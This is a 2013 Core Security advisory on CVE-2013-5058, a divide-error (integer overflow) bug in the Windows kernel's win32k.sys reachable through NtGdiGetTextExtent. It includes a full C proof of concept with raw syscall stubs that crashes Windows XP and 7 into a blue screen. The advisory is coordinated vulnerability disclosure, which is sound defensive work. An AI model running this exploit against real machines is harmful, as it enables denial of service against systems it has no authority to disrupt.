6.9 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
0.001 Low
EPSS
Percentile
43.2%
**Title:**Divide Error in Windows Kernel
**Advisory ID:**CORE-2013-0807
**Advisory URL:**http://www.coresecurity.com/core-labs/advisories/divide-error-windows-kernel
**Date published:**2013-12-11
**Date of last update:**2013-12-11
**Vendors contacted:**Microsoft
**Release mode:**Coordinated release
**Class:**Integer overflow [CWE-190]
**Impact:**Denial of service
**Remotely Exploitable:**No
**Locally Exploitable:**Yes
CVE Name:CVE-2013-5058
Windows kernel is prone to a security vulnerability when executing the (GDI support) function RFONTOBJ::bTextExtent
located in win32k.sys
. This vulnerability could be exploited by an attacker to crash the windows kernel by calling the user mode function NtGdiGetTextExtent
with specially crafted arguments.
Microsoft notifies that this vulnerability may allow a Elevation of Privilege attack but did not provide further technical details.
For additional information regarding affected versions, non-affected versions, fixes and official patches please visit:
This vulnerability was discovered and researched by Nicolas Economou from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
The vulnerable function is RFONTOBJ::bTextExtent
, located in the Windows kernel driver win32k.sys
. The way to call this function from user mode is calling the function NtGdiGetTextExtent
.
The bug takes place when performing a signed division IDIV
, the result does not fit in the destination and the kernel raises an INTEGER OVERFLOW
exception.
The following PoC was compiled in VS2012 and tested against Windows XP and Windows 7, and it allows reproducing the vulnerability. By running this PoC the affected OS will crash into a blue screen.
# include <windows.h> # include <stdio.h> __declspec (naked) int _NtGdiSetTextJustification
(HDC v1, int extra, int count) { // Windows XP __asm mov eax,0x111e __asm mov edx,0x7ffe0300
__asm call dword ptr [edx] __asm ret 0x0c } __declspec (naked) int _NtGdiGetTextExtent (HDC v1,
int v2, int v3, int v4, int v5) { // Windows XP __asm mov eax,0x10cc __asm mov edx,0x7ffe0300
__asm call dword ptr [edx] __asm ret 0x14 } __declspec (naked) int _NtGdiSetTextJustification_W7
(HDC v1, int extra, int count) { // Windows 7 __asm mov eax,0x1129 __asm mov edx,0x7ffe0300 __asm
call dword ptr [edx] __asm ret 0x0c } __declspec (naked) int _NtGdiGetTextExtent_W7 (HDC v1, int
v2, int v3, int v4, int v5) { // Windows 7 __asm mov eax,0x10D6 __asm mov edx,0x7ffe0300 __asm call
dword ptr [edx] __asm ret 0x14 } int main () { char buffer [4096]; OSVERSIONINFO v; HDC hdc; memset
(buffer, 0, 4096); /* Obtaining the OS version */ memset(&v, 0, sizeof(v)); v.dwOSVersionInfoSize =
sizeof(v); GetVersionEx(&v); hdc = CreateCompatibleDC(NULL); /* If it's Windows XP */ if ((v.dwMajorVersion
== 5) && (v.dwMinorVersion == 1)) { _NtGdiSetTextJustification(hdc, 0x08000000, 0xffffffff); _NtGdiGetTextExtent
(hdc, (int) buffer, 0x11, 0x44444444, 0x55555555); } /* If it's Windows 7 */ else if ((v.dwMajorVersion == 6)
&& (v.dwMinorVersion == 1)) { _NtGdiSetTextJustification_W7(hdc, 0x08000000, 0xffffffff); _NtGdiGetTextExtent_W7
(hdc, (int) buffer, 0x11, 0x44444444, 0x55555555); } else { printf("unsupported OS\n"); } return 0; }
[1] Microsoft Security Bulletin MS13-101, <https://technet.microsoft.com/en-us/security/bulletin/ms13-101>.
[2] Description of the security update for Windows kernel-mode drivers, <http://support.microsoft.com/kb/2893984>.
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached on the Web at: <https://www.coresecurity.com>.
The contents of this advisory are copyright © 2013 Core Security Technologies and © 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team.